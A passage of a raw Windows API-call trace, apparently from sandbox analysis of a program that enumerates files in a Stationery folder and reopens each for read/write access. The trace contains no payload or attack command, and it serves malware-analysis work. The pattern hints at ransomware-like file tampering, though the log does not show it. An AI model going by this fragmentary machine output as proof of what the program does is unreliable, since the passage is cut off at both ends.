Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.957] AreFileApisANSI () returned 1 [0086.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm", lpUsedDefaultChar=0x0) returned 68 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0086.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0086.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0086.958] AreFileApisANSI () returned 1 [0086.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0086.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82c28 [0086.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned 68 [0086.958] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.108] GetFileType (hFile=0x348) returned 0x1 [0087.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0087.108] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.108] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.109] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.109] CloseHandle (hObject=0x348) returned 1 [0087.109] AreFileApisANSI () returned 1 [0087.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82208 [0087.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned 68 [0087.109] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.110] GetLastError () returned 0x5 [0087.110] GetLastError () returned 0x5 [0087.110] SetLastError (dwErrCode=0x5) [0087.110] GetLastError () returned 0x5 [0087.110] SetLastError (dwErrCode=0x5) [0087.110] GetLastError () returned 0x5 [0087.110] SetLastError (dwErrCode=0x5) [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0087.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.110] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0087.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0087.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0087.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0087.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0087.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0087.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.111] AreFileApisANSI () returned 1 [0087.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg", lpUsedDefaultChar=0x0) returned 68 [0087.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0087.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0087.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.111] AreFileApisANSI () returned 1 [0087.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82dd8 [0087.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned 68 [0087.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.113] GetFileType (hFile=0x348) returned 0x1 [0087.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0087.113] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.113] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.113] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.114] CloseHandle (hObject=0x348) returned 1 [0087.114] AreFileApisANSI () returned 1 [0087.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82688 [0087.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned 68 [0087.114] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.114] GetLastError () returned 0x5 [0087.114] GetLastError () returned 0x5 [0087.114] SetLastError (dwErrCode=0x5) [0087.114] GetLastError () returned 0x5 [0087.114] SetLastError (dwErrCode=0x5) [0087.114] GetLastError () returned 0x5 [0087.114] SetLastError (dwErrCode=0x5) [0087.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0087.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0087.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.114] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a3ecc0a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d2da05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d2da05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0087.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.115] AreFileApisANSI () returned 1 [0087.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini", lpUsedDefaultChar=0x0) returned 70 [0087.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0087.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.116] AreFileApisANSI () returned 1 [0087.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0087.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a5c8 [0087.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0087.116] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.117] GetFileType (hFile=0x424) returned 0x1 [0087.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0087.118] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.118] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.118] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.118] CloseHandle (hObject=0x424) returned 1 [0087.118] AreFileApisANSI () returned 1 [0087.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0087.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a368 [0087.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0087.118] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.119] GetFileType (hFile=0x424) returned 0x1 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0087.119] CloseHandle (hObject=0x424) returned 1 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0087.120] RtlAllocateHeap 